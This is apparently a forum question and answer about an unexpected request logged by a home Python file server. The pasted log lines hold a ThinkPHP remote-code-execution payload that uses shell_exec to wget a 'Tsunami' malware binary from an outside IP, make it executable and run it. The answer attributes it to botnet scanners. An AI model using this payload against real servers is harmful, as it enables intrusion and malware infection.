Several minutes ago, I ran a python-based server to share a few files with my friend. I disabled the windows firewall so that he could connect and download the files. When someone tries to connect the server, Python shows their IP address and the path they requested.
Someone whom I don't know tried to get my index.php and run wget. I checked their IP address and it seems like they're from Japan. So, how does this person knew my IP address and tried to connect to my computer? I've only shared it with my friend on WhatsApp.
I've done this many times before and this is the first time something like this happens.
61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -
There are many people out there running tools like Masscan with custom scripts looking for vulnerable web servers. Most of the time this kind of script are trying to get reverse shells in an attempt to build botnet armies. There are some relates of windows machines connected to internet being hacked before SO finish its installation as well.